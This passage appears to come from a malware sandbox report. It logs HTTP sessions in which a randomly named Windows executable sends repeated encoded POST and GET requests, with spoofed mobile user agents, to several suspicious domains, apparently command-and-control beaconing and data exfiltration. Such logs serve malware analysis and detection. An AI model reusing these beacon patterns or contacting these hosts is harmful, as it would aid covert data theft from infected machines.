                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; SAMSUNG-SGH-I747 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                      Data Ascii: 4rl8h=RfJp1+tCLcajaEsKNMNtEwjh+9pP3lFYWaHGIzhsOIIbIZKCOQUqPOx3kVab+kWKygFTh8vMy8N10TLxx+Z/RWyvJ9QIrfazN/fepAYQ0OAlePIbtAuXNgrlOT3qSUEZLF+u8ydxRey2ir1J/WzXGigmSkDpHkHLh4rQtXrjseKDr2wN5pPnpl6lQv2dDikBUibD+KigFC6Hozjp0H4C0dU=
                      Sep 22, 2024 18:03:11.691978931 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                      Date: Sun, 22 Sep 2024 16:03:11 GMT
                      Server: Apache
                      X-Frame-Options: SAMEORIGIN
                      Content-Length: 32106
                      X-XSS-Protection: 1; mode=block
                      Connection: close
                      Content-Type: text/html


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      11 | 192.168.2.4 | 49748 | 67.223.117.189 | 80 | 1904 | C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Sep 22, 2024 18:03:13.640140057 CEST | 10833 | OUT | POST /unks/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.9
                      Accept-Encoding: gzip, deflate, br
                      Host: www.uburn.xyz
                      Content-Type: application/x-www-form-urlencoded
                      Content-Length: 10302
                      Connection: close
                      Cache-Control: no-cache
                      Origin: http://www.uburn.xyz
                      Referer: http://www.uburn.xyz/unks/
                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; SAMSUNG-SGH-I747 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                      Data Ascii: 4rl8h=[TRUNCATED]
                      Sep 22, 2024 18:03:14.289649010 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                      Date: Sun, 22 Sep 2024 16:03:14 GMT
                      Server: Apache
                      X-Frame-Options: SAMEORIGIN
                      Content-Length: 32106
                      X-XSS-Protection: 1; mode=block
                      Connection: close
                      Content-Type: text/html


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      12 | 192.168.2.4 | 49749 | 67.223.117.189 | 80 | 1904 | C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Sep 22, 2024 18:03:16.185085058 CEST | 475 | OUT | GET /unks/?4rl8h=cdhJ2J1BF/3FP1t6JbliQByYvepm5n0GJvy2RzMWe/YhGvvDNzkKTft45HunghqbyAFMp5DD9OJS7Rih3uNIOlCSON0kvMqKINfWmh1G6LwRZZAk9zqDBj8=&CfmHC=h4QXpn780jb HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.9
                      Host: www.uburn.xyz
                      Connection: close
                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; SAMSUNG-SGH-I747 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                      Sep 22, 2024 18:03:16.780487061 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                      Date: Sun, 22 Sep 2024 16:03:16 GMT
                      Server: Apache
                      X-Frame-Options: SAMEORIGIN
                      Content-Length: 32106
                      X-XSS-Protection: 1; mode=block
                      Connection: close
                      Content-Type: text/html; charset=utf-8
                      Data Ascii: </li> <li><a class="dropdown-item dropdown-toggle" href="#">Header 3</a> <ul class="dropdown-menu">
                      Sep 22, 2024 18:03:16.783488035 CEST1236INData Raw: 61 64 65 72 20 34 20 4c 69 67 68 74 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                      Data Ascii: ader 4 Light</a></li> <li><a class="dropdown-item" href="header4-dark.html">Header 4 Dark</a></li> </ul>
                      Sep 22, 2024 18:03:16.786020041 CEST1236INData Raw: 72 73 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 75 6c 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 6d 65 6e 75 22 3e 20
                      Data Ascii: rs</a> <ul class="dropdown-menu"> <li><a class="dropdown-item dropdown-toggle" href="#">Footer 1</a>


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      13 | 192.168.2.4 | 49750 | 85.159.66.93 | 80 | 1904 | C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Sep 22, 2024 18:03:21.999027014 CEST | 764 | OUT | POST /og3c/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.9
                      Accept-Encoding: gzip, deflate, br
                      Host: www.sppsuperplast.online
                      Content-Type: application/x-www-form-urlencoded
                      Content-Length: 202
                      Connection: close
                      Cache-Control: no-cache
                      Origin: http://www.sppsuperplast.online
                      Referer: http://www.sppsuperplast.online/og3c/
                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; SAMSUNG-SGH-I747 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      14 | 192.168.2.4 | 49751 | 85.159.66.93 | 80 | 1904 | C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Sep 22, 2024 18:03:24.548738956 CEST | 784 | OUT | POST /og3c/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.9
                      Accept-Encoding: gzip, deflate, br
                      Host: www.sppsuperplast.online
                      Content-Type: application/x-www-form-urlencoded
                      Content-Length: 222
                      Connection: close
                      Cache-Control: no-cache
                      Origin: http://www.sppsuperplast.online
                      Referer: http://www.sppsuperplast.online/og3c/
                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; SAMSUNG-SGH-I747 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      15 | 192.168.2.4 | 49752 | 85.159.66.93 | 80 | 1904 | C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Sep 22, 2024 18:03:27.098366976 CEST | 10866 | OUT | POST /og3c/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.9
                      Accept-Encoding: gzip, deflate, br
                      Host: www.sppsuperplast.online
                      Content-Type: application/x-www-form-urlencoded
                      Content-Length: 10302
                      Connection: close
                      Cache-Control: no-cache
                      Origin: http://www.sppsuperplast.online
                      Referer: http://www.sppsuperplast.online/og3c/
                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; SAMSUNG-SGH-I747 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      16 | 192.168.2.4 | 49753 | 85.159.66.93 | 80 | 1904 | C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Sep 22, 2024 18:03:29.638155937 CEST | 486 | OUT | GET /og3c/?4rl8h=PJMN73v+cS+JEOCp4MHXb74XFyLCcf/8AP5dNED26sKmApKDXWDqmSS3jfO80ER4JfpprrZAuqpt1wLlM7DUug2WU25CtLkRmct6bnS3AqTVtMg1RKgxnn8=&CfmHC=h4QXpn780jb HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.9
                      Host: www.sppsuperplast.online
                      Connection: close
                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; SAMSUNG-SGH-I747 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                      Sep 22, 2024 18:03:30.374783039 CEST | 225 | IN | HTTP/1.1 404 Not Found
                      Server: nginx/1.14.1
                      Date: Sun, 22 Sep 2024 16:03:30 GMT
                      Content-Length: 0
                      Connection: close
                      X-Rate-Limit-Limit: 5s
                      X-Rate-Limit-Remaining: 19
                      X-Rate-Limit-Reset: 2024-09-22T16:03:35.2633987Z


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      17 | 192.168.2.4 | 49754 | 208.91.197.27 | 80 | 1904 | C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Sep 22, 2024 18:03:35.697856903 CEST | 758 | OUT | POST /c45k/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.9
                      Accept-Encoding: gzip, deflate, br
                      Host: www.palcoconnector.net
                      Content-Type: application/x-www-form-urlencoded
                      Content-Length: 202
                      Connection: close
                      Cache-Control: no-cache
                      Origin: http://www.palcoconnector.net
                      Referer: http://www.palcoconnector.net/c45k/
                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; SAMSUNG-SGH-I747 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      18 | 192.168.2.4 | 49755 | 208.91.197.27 | 80 | 1904 | C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Sep 22, 2024 18:03:38.236916065 CEST | 778 | OUT | POST /c45k/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.9
                      Accept-Encoding: gzip, deflate, br
                      Host: www.palcoconnector.net
                      Content-Type: application/x-www-form-urlencoded
                      Content-Length: 222
                      Connection: close
                      Cache-Control: no-cache
                      Origin: http://www.palcoconnector.net
                      Referer: http://www.palcoconnector.net/c45k/
                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; SAMSUNG-SGH-I747 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      19 | 192.168.2.4 | 49756 | 208.91.197.27 | 80 | 1904 | C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Sep 22, 2024 18:03:40.783293962 CEST | 10860 | OUT | POST /c45k/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.9
                      Accept-Encoding: gzip, deflate, br
                      Host: www.palcoconnector.net
                      Content-Type: application/x-www-form-urlencoded
                      Content-Length: 10302
                      Connection: close
                      Cache-Control: no-cache
                      Origin: http://www.palcoconnector.net
                      Referer: http://www.palcoconnector.net/c45k/
                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; SAMSUNG-SGH-I747 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      20 | 192.168.2.4 | 49757 | 208.91.197.27 | 80 | 1904 | C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Sep 22, 2024 18:03:43.325685978 CEST | 484 | OUT | GET /c45k/?4rl8h=08ptcl9k6k3Clc+jjfTphEeOe2lz7AEUYr4PirX9ycnlRkqnpIEJhgCFSf5hEjt7uErMgv9wtAp1yqXhXhWRgW+nHLlYanRICP4JCJqgUGT9OLnA1kIzPD4=&CfmHC=h4QXpn780jb HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.9
                      Host: www.palcoconnector.net
                      Connection: close
                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; SAMSUNG-SGH-I747 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                      Sep 22, 2024 18:03:59.826951027 CEST | 1236 | IN | HTTP/1.1 200 OK
                      Date: Sun, 22 Sep 2024 16:03:43 GMT
                      Server: Apache
                      Referrer-Policy: no-referrer-when-downgrade
                      Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
                      Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
                      Set-Cookie: vsid=907vr4745666393233509; expires=Fri, 21-Sep-2029 16:03:59 GMT; Max-Age=157680000; path=/; domain=www.palcoconnector.net; HttpOnly
                      X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_SMLFVwmDFabq4t0j70zhF2EMjLk0ddPhHRvelr3FRFUiq5rP4+hLl/hQVu4PXgzlOpWmr4MY/fxvNM0of78tfA==
                      Transfer-Encoding: chunked
                      Content-Type: text/html; charset=UTF-8
                      Connection: close


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      21 | 192.168.2.4 | 49758 | 195.161.68.8 | 80 | 1904 | C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Sep 22, 2024 18:04:10.490864038 CEST | 758 | OUT | POST /0dae/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.9
                      Accept-Encoding: gzip, deflate, br
                      Host: www.trapkitten.website
                      Content-Type: application/x-www-form-urlencoded
                      Content-Length: 202
                      Connection: close
                      Cache-Control: no-cache
                      Origin: http://www.trapkitten.website
                      Referer: http://www.trapkitten.website/0dae/
                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; SAMSUNG-SGH-I747 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                      Sep 22, 2024 18:04:11.273576975 CEST | 778 | IN | HTTP/1.1 404 Not Found
                      Date: Sun, 22 Sep 2024 16:04:11 GMT
                      Content-Type: text/html
                      Content-Length: 634
                      Connection: close
                      Server: Apache
                      Data Ascii: <!DOCTYPE html><html data-page="404"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><title> 404. </title></head><body><noscript><h1> 404. </h1><p>, , , , .</p><p><a href="https://jino.ru"></a></p></noscript><div id="root"></div><script src="//parking-static.jino.ru/static/main.js?1.25.2" charset="utf-8"></script></body></html>


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      22 | 192.168.2.4 | 49759 | 195.161.68.8 | 80 | 1904 | C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Sep 22, 2024 18:04:13.046003103 CEST | 778 | OUT | POST /0dae/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.9
                      Accept-Encoding: gzip, deflate, br
                      Host: www.trapkitten.website
                      Content-Type: application/x-www-form-urlencoded
                      Content-Length: 222
                      Connection: close
                      Cache-Control: no-cache
                      Origin: http://www.trapkitten.website
                      Referer: http://www.trapkitten.website/0dae/
                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; SAMSUNG-SGH-I747 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                      Data Ascii: 4rl8h=uVl3vCC0V900qZmVHBM4JxX6ZNtcIBmbGAmzp/LDNtJcTmKoip8c+viW2JsKpuT3BkqNQx7RItu/qaPphgUaXxF5g+caFzpDQFTDLUul9vt4sy6ellR/pGD6Xv6J8+GUzY0k7V9jpCzsi5M+XfRYyHlEKhqiFDMQ7b+U1/YWsEkvyZM0MKkyRG5y0q7IUKVU4Wnl0JQCucaQzoFG04C5OPw=
                      Sep 22, 2024 18:04:13.853189945 CEST | 778 | IN | HTTP/1.1 404 Not Found
                      Date: Sun, 22 Sep 2024 16:04:13 GMT
                      Content-Type: text/html
                      Content-Length: 634
                      Connection: close
                      Server: Apache
                      Data Ascii: <!DOCTYPE html><html data-page="404"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><title> 404. </title></head><body><noscript><h1> 404. </h1><p>, , , , .</p><p><a href="https://jino.ru"></a></p></noscript><div id="root"></div><script src="//parking-static.jino.ru/static/main.js?1.25.2" charset="utf-8"></script></body></html>


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      23 | 192.168.2.4 | 49760 | 195.161.68.8 | 80 | 1904 | C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Sep 22, 2024 18:04:15.598016024 CEST | 10860 | OUT | POST /0dae/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.9
                      Accept-Encoding: gzip, deflate, br
                      Host: www.trapkitten.website
                      Content-Type: application/x-www-form-urlencoded
                      Content-Length: 10302
                      Connection: close
                      Cache-Control: no-cache
                      Origin: http://www.trapkitten.website
                      Referer: http://www.trapkitten.website/0dae/
                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; SAMSUNG-SGH-I747 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                      Sep 22, 2024 18:04:16.345988989 CEST | 778 | IN | HTTP/1.1 404 Not Found
                      Date: Sun, 22 Sep 2024 16:04:16 GMT
                      Content-Type: text/html
                      Content-Length: 634
                      Connection: close
                      Server: Apache
                      Data Ascii: <!DOCTYPE html><html data-page="404"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><title> 404. </title></head><body><noscript><h1> 404. </h1><p>, , , , .</p><p><a href="https://jino.ru"></a></p></noscript><div id="root"></div><script src="//parking-static.jino.ru/static/main.js?1.25.2" charset="utf-8"></script></body></html>


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      24 | 192.168.2.4 | 49761 | 195.161.68.8 | 80 | 1904 | C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Sep 22, 2024 18:04:18.267949104 CEST | 484 | OUT | GET /0dae/?CfmHC=h4QXpn780jb&4rl8h=jXNXsyq5R/QDxa7bJ2ljemvTesZ1LTXEaXuC8OrACrNOR23rlYUr+PSW9bwqyvvRK2/UTV39N9+HzvOrg18nL3Fjm+gENjZiKF7fGS3+8e9UoB+RgXgdxF4= HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.9
                      Host: www.trapkitten.website
                      Connection: close
                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; SAMSUNG-SGH-I747 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                      Sep 22, 2024 18:04:19.030797958 CEST | 778 | IN | HTTP/1.1 404 Not Found
                      Date: Sun, 22 Sep 2024 16:04:18 GMT
                      Content-Type: text/html
                      Content-Length: 634
                      Connection: close
                      Server: Apache
                      Data Ascii: <!DOCTYPE html><html data-page="404"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><title> 404. </title></head><body><noscript><h1> 404. </h1><p>, , , , .</p><p><a href="https://jino.ru"></a></p></noscript><div id="root"></div><script src="//parking-static.jino.ru/static/main.js?1.25.2" charset="utf-8"></script></body></html>


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      25 | 192.168.2.4 | 49762 | 194.58.112.174 | 80 | 1904 | C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Sep 22, 2024 18:04:24.297266960 CEST | 761 | OUT | POST /vyk8/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.9
                      Accept-Encoding: gzip, deflate, br
                      Host: www.albero-dveri.online
                      Content-Type: application/x-www-form-urlencoded
                      Content-Length: 202
                      Connection: close
                      Cache-Control: no-cache
                      Origin: http://www.albero-dveri.online
                      Referer: http://www.albero-dveri.online/vyk8/
                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; SAMSUNG-SGH-I747 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                      Data Ascii: 4rl8h=y++dmyyUvm64+FDD32n0XewULBhb/CSoeufpJSAXG8XN8rVj+8PrpB56QyHVKsOb0idtdYJCqHgWKWNxaVifDIcxmilzHJ79kcpKeY0zG+r2l8EBG03vmPK24zEMQ/fYN4jzauWffCSAIgqEBcFp3iw+//ef12rMYBAiGULcyx9DiwoFiMywbEHPXD4iOYNm/A==
                      Sep 22, 2024 18:04:25.260416985 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                      Server: nginx
                      Date: Sun, 22 Sep 2024 16:04:24 GMT
                      Content-Type: text/html
                      Transfer-Encoding: chunked
                      Connection: close
                      Content-Encoding: gzip
                      Sep 22, 2024 18:04:25.260729074 CEST | 1236 | IN
                      Sep 22, 2024 18:04:25.260740042 CEST | 1236 | IN
                      Sep 22, 2024 18:04:25.261538029 CEST | 116 | IN


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      26 | 192.168.2.4 | 49763 | 194.58.112.174 | 80 | 1904 | C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Sep 22, 2024 18:04:26.854497910 CEST | 781 | OUT | POST /vyk8/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.9
                      Accept-Encoding: gzip, deflate, br
                      Host: www.albero-dveri.online
                      Content-Type: application/x-www-form-urlencoded
                      Content-Length: 222
                      Connection: close
                      Cache-Control: no-cache
                      Origin: http://www.albero-dveri.online
                      Referer: http://www.albero-dveri.online/vyk8/
                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; SAMSUNG-SGH-I747 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                      Data Ascii: 4rl8h=y++dmyyUvm648kTDkl/0DOwVOBhb0iSsepXpJQsHFOjN8Llj/4bruB56bSHQAMOQ0iQQddxCqHkWKUFxbi+YDYc3vClxa579kcpKeYQdG+z2mM0BEV3uuvK3/zEMU/fcN4iWary5fB6AIluEBOtmsyxUgPfw5lPBBSRiFWDCzBpQqW5fz9TnJEj8KExWDbwvkEzMij7Hmsuwi7bj8ExnFmQ=
                      Sep 22, 2024 18:04:27.533940077 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                      Server: nginx
                      Date: Sun, 22 Sep 2024 16:04:27 GMT
                      Content-Type: text/html
                      Transfer-Encoding: chunked
                      Connection: close
                      Content-Encoding: gzip
                      Sep 22, 2024 18:04:27.534173965 CEST | 1236 | IN
                      Sep 22, 2024 18:04:27.534192085 CEST | 448 | IN
                      Sep 22, 2024 18:04:27.534605980 CEST | 904 | IN


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      27 | 192.168.2.4 | 49764 | 194.58.112.174 | 80 | 1904 | C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Sep 22, 2024 18:04:29.391489029 CEST | 10863 | OUT | POST /vyk8/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.9
                      Accept-Encoding: gzip, deflate, br
                      Host: www.albero-dveri.online
                      Content-Type: application/x-www-form-urlencoded
                      Content-Length: 10302
                      Connection: close
                      Cache-Control: no-cache
                      Origin: http://www.albero-dveri.online
                      Referer: http://www.albero-dveri.online/vyk8/
                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; SAMSUNG-SGH-I747 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                      Sep 22, 2024 18:04:30.089948893 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                      Server: nginx
                      Date: Sun, 22 Sep 2024 16:04:29 GMT
                      Content-Type: text/html
                      Transfer-Encoding: chunked
                      Connection: close
                      Content-Encoding: gzip
                      Sep 22, 2024 18:04:30.090130091 CEST | 224 | IN
                      Sep 22, 2024 18:04:30.090140104 CEST | 1236 | IN
                      Sep 22, 2024 18:04:30.090668917 CEST | 1128 | IN


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      28 | 192.168.2.4 | 49765 | 194.58.112.174 | 80 | 1904 | C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Sep 22, 2024 18:04:31.940951109 CEST | 485 | OUT | GET /vyk8/?4rl8h=/8W9lHmy/meYp2fNs3efAdRvbFxf2DuKL4zSfhQhCqnq6Zc+yf7I5zlrSSPwb+CI3DZqbI5vil5mP2MKXHyCXZgHhQsXe7748Z5EYcVgGcHWqsQ0OU2KuuY=&CfmHC=h4QXpn780jb HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.9
                      Host: www.albero-dveri.online
                      Connection: close
                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; SAMSUNG-SGH-I747 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                      Sep 22, 2024 18:04:32.644238949 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                      Server: nginx
                      Date: Sun, 22 Sep 2024 16:04:32 GMT
                      Content-Type: text/html
                      Transfer-Encoding: chunked
                      Connection: close
